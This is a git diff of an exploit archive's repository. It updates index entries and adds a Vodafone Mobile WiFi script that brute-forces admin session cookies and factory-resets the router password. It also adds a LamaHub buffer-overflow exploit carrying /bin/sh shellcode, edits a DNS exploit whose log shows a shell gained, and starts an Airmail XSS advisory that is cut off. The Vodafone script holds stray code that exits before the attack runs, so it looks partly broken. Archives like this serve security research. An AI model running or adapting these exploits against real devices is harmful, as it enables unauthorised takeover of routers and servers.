Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0 @@ -12692,7 +12692,7 @@ id,file,description,date,author,platform,type,port 14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 -14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 +14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0 @@ -12721,7 +12721,7 @@ id,file,description,date,author,platform,type,port 14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0 -14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 +14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0 @@ -12818,7 +12818,7 @@ id,file,description,date,author,platform,type,port 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0 -14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21 +14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80 @@ -14004,7 +14004,7 @@ id,file,description,date,author,platform,type,port 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 +16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0 @@ -15100,7 +15100,7 @@ id,file,description,date,author,platform,type,port 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 +17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0 @@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0 -22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 +22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0 @@ -21659,7 +21659,7 @@ id,file,description,date,author,platform,type,port 24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 -24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0 +24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0 24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 @@ -25700,6 +25700,7 @@ id,file,description,date,author,platform,type,port 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,windows,dos,0 28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 +40359,platforms/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,osx,webapps,0 28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 @@ -27957,6 +27958,7 @@ id,file,description,date,author,platform,type,port 31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0 31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0 +40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0 31071,platforms/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0 31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0 @@ -28056,6 +28058,7 @@ id,file,description,date,author,platform,type,port 31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0 31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0 31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0 +40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80 31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0 31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0 @@ -28430,7 +28433,7 @@ id,file,description,date,author,platform,type,port 31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0 31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0 -40353,platforms/php/webapps/40353.py,"Zabbix 2.0 - 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0 +40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0 31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0 31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0 @@ -33616,7 +33619,7 @@ id,file,description,date,author,platform,type,port 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 -37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 +37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 @@ -34709,7 +34712,7 @@ id,file,description,date,author,platform,type,port 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 -38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0 +38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 @@ -35517,8 +35520,8 @@ id,file,description,date,author,platform,type,port 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 -39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 -39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 +39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 @@ -36394,7 +36397,7 @@ id,file,description,date,author,platform,type,port 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0 -40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80 +40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80 diff --git a/platforms/hardware/webapps/40357.py b/platforms/hardware/webapps/40357.py new file mode 100755 index 000000000..09b370da3 --- /dev/null +++ b/platforms/hardware/webapps/40357.py @@ -0,0 +1,116 @@ +import urllib2 +import json +from datetime import datetime, timedelta +import time +import httplib +from threading import Thread +from Queue import Queue +from multiprocessing import process + + +print """ +Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa) +""" +thread_lock = False +session = "" +def unix_time_millis(dt): + epoch = datetime.utcfromtimestamp(0) + return int(((dt - epoch).total_seconds() * 1000.0) / 1000) + +a=False + +def check_process_output(): + print 1 + +p = process.Process(target=check_process_output) +p.start() + +print a +exit(0) + +def crack(queue): + global thread_lock + global session + while True: + if thread_lock: + exit(0) + if not queue.empty(): + cookie = queue.get() + headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie} + req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s" + % time.time(), None, headers) + result = urllib2.urlopen(req).read() + if json.loads(result)["AuthMode"] != "": + print "[+] Found valid admin session!" + print "[INFO] Terminating other threads ... please wait" + session = cookie + queue.task_done() + thread_lock = True + + +def start_threads_with_args(target, n, arg): + thread_pool = [] + for n_threads in range(0, n): + thread = Thread(target=target, args=(arg,)) + thread_pool.append(thread) + thread_pool[-1].start() + return thread_pool + +def start_bruteforce(): + global session + global thread_lock + queue = Queue(0) + start_threads_with_args(crack, 15, queue) + print"[!] Trying fast bruteforce..." + for x in range(0, 1000): + if thread_lock: + break + queue.put("123abc456def789%03d" % x) + while True: + if session != "": + return session + if queue.empty(): + break + print "[!] Trying slow bruteforce..." + for milliseconds in range(0, how_many): + if thread_lock: + break + queue.put("123abc456def789%s" % (start + milliseconds)) + while True: + if session != "": + return session + if queue.empty(): + break + return session +if __name__ == "__main__": + now = datetime.now() + hours = raw_input("How many hours ago admin logged in: ") + minutes = raw_input("How many minutes ago admin logged in: ") + init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes)) + end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999) + start = unix_time_millis(init) + how_many = unix_time_millis(end) - start + 1 + print "[+] Starting session bruteforce with 15 threads" + valid_session = "" + try: + valid_session = start_bruteforce() + except KeyboardInterrupt: + print "[-] Exiting.." + thread_lock = True + exit(0) + if valid_session == "": + print "[!] Can't find valid session :( quitting..." + exit(0) + print "[+] Resetting router password to 'admin' , network may be down for a while" + headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session} + req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process", + "goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers) + try: + urllib2.urlopen(req).read() + except httplib.BadStatusLine: + print "[!] Password resetted to admin! have fun!" + exit(0) + except Exception: + print "[x] Error during password reset" + print "[-] Can't reset password try manually, your session is: %s" % valid_session + diff --git a/platforms/linux/remote/40339.py b/platforms/linux/remote/40339.py index 20a8daf1f..dcb3c5f90 100755 --- a/platforms/linux/remote/40339.py +++ b/platforms/linux/remote/40339.py @@ -1,4 +1,6 @@ -''' + +/* + add by SpeeDr00t@Blackfalcon (jang kyoung chip) This is a published vulnerability by google in the past. @@ -14,9 +16,7 @@ it was missing information on shellcode. So, I tried to completed the shellcode. In the future, I hope to help your study. - -(gdb) gdb -q client1 -Undefined command: "gdb". Try "help". + (gdb) r Starting program: /home/haker/client1 Got object file from memory but can't read symbols: File truncated. @@ -27,8 +27,8 @@ sendto 1 TCP Connected with 127.0.0.1:60259 [TCP] Total Data len recv 76 [TCP] Request1 len recv 36 -data1 = ��foobargooglecom -query = foobargooglecom$(�foobargooglecom +data1 = ��foobargooglecom +query = foobargooglecom$(�foobargooglecom [TCP] Request2 len recv 36 sendto 2 data1_reply @@ -40,8 +40,8 @@ sendto 1 TCP Connected with 127.0.0.1:60260 [TCP] Total Data len recv 76 [TCP] Request1 len recv 36 -data1 = ��foobargooglecom -query = foobargooglecom$�7foobargooglecom +data1 = ��foobargooglecom +query = foobargooglecom$�7foobargooglecom [TCP] Request2 len recv 36 sendto 2 data1_reply @@ -49,9 +49,12 @@ data2_reply process 6415 is executing new program: /bin/dash $ id uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) -$ +$ + +*/ + + -''' import socket import time @@ -235,4 +238,4 @@ if __name__ == "__main__": t.daemon = True t.start() tcp_thread() - terminate = True + terminate = True \ No newline at end of file diff --git a/platforms/linux/remote/40358.py b/platforms/linux/remote/40358.py new file mode 100755 index 000000000..11cb2e8c8 --- /dev/null +++ b/platforms/linux/remote/40358.py @@ -0,0 +1,85 @@ +# Exploit Title: LamaHub-0.0.6.2 BufferOverflow +# Date: 09/09/09 +# Exploit Author: Pi3rrot +# Vendor Homepage: http://lamahub.sourceforge.net/ +# Software Link: http://ovh.dl.sourceforge.net/sourceforge/lamahub/LamaHub-0.0.6.2.tar.gz +# Version: 0.0.6.2 +# Tested on: Debian 8 32bits + +# This exploit may crash the Lamahub service in many cases. +# If you compile with -fno-stack-protection and -z execstack +# you will be able to execute arbitrary code. +# +# Thanks to the AFL dev' for making the fuzzer who find the crash ;) +# Thanks to gapz for AFL configuration. +# +# pierre@pi3rrot.net + + +# How it works ? +# Client side: +# exploit_writeEIP.py + +# Server side: +# ➜ ./server +# > init () -> OK +# > started on port -> 4111 +# > new client -> 127.0.0.1 -> 4 +# $ whoami +# pierre +# $ + + +import socket + +HOST = 'localhost' +PORT = 4111 +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((HOST, PORT)) + +buf = "" +buf += "\x24\x53\x75\x70\x70\x6f\x72\x74\x73\x20\x55\x73" +buf += "\x6c\x6c\x6f\x20\x49\x50\x32\x20\x65\x61\x72\x63" +buf += "\x68\x20\x5a\x50\x65\x30\x20\x7c\x24\x4b\x65\x79" +buf += "\x61\x7c\x24\x56\x61\x6c\x69\x64\x61\x74\x65\x4e" +buf += "\x69\x63\x6b\x20\x50\x69\x65\x72\x72\x65\x7c\x24" +buf += "\x56\x65\x6e\x20\x31\x2c\x30\x30\x39\x31\x7c\x24" +buf += "\x47\x01\x00\x4e\x3b\x63\x6b\x4c\x69\x73\x74\x7c" +buf += "\x24\x4d\x79\x49\x4e\x46\x4f\x20\x24\x41\x4c\x4c" +buf += "\x20\x50\x69\x65\x72\x72\x65\x20\x4a\x65" + +#NEED padding of 96 +shellcode = "\x90" *30 +shellcode += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80" +shellcode += "\x90"*42 +print "Shellcode len: " +print len(shellcode) + +buf2 = "\x61\x3c" +buf2 += "\x3c\x24\x4d\x79\x80\x00\x35\x24\x70\x69\x24\x30" +buf2 += "\x24\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37\x37" +buf2 += "\x37\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1" +buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1" +buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1" +buf2 += "\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1" +buf2 += "\xb1\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" +buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" +buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" +buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" +buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" +buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" +buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" +buf2 += "\x2c\x2c\x2c\x2c\x2c\x2c\x2c\x2c" + +eip_overwrite = "\x2a\x6a\x06\x08" +#eip_overwrite = "AAAA" +buf3 = "\xd6\x26\x06\x08\xb1\xb1\xb1\xb1\xb1\xb1\xb1\xb1" +buf3 += "\xb1\xb1\xb1\xb1\x37\x37\x30\x2c\x49\x4e\x46\x4f" +buf3 += "\x24\xca\xca\xca\xca\x20\x5a\x50\x65\x30\x20\x7c" +buf3 += "\x24\x4b\x65\x79\x61\x7c\x24\x56\x20\x41\x20\x30" +buf3 += "\x61\x7c\x24\x56\x69\x63\x6b\x20\x50\x69\xca\xca" +buf3 += "\x0a" + +# Send EVIL PACKET ! +s.sendall(buf + shellcode + buf2 + eip_overwrite + buf3) +s.close() diff --git a/platforms/osx/webapps/40359.txt b/platforms/osx/webapps/40359.txt new file mode 100755 index 000000000..a06673364 --- /dev/null +++ b/platforms/osx/webapps/40359.txt @@ -0,0 +1,36 @@ +Airmail is a popular email client on iOS and OS X. +I found a vulnerability in airmail of the latest version which could cause +a file:// xss and arbitrary file read. + +Author: redrain, yu.hong@chaitin.com +Date: 2016-08-15 +Version: 3.0.2 and earlier +Platform: OS X and iOS +Site: http://airmailapp.com/ +Vendor: http://airmailapp.com/ +Vendor Notified: 2016-08-15 + +Vulnerability: +There is a file:// xss in airmail version 3.0.2 and earlier. +The app can deal the URLscheme render with link detection, any user can +edit the email content in reply with the evil code with the TL;DR. + +Airmail implements its user interface using an embedded version of WebKit, +furthermore Airmail on OS X will render any URI as a clickable HTML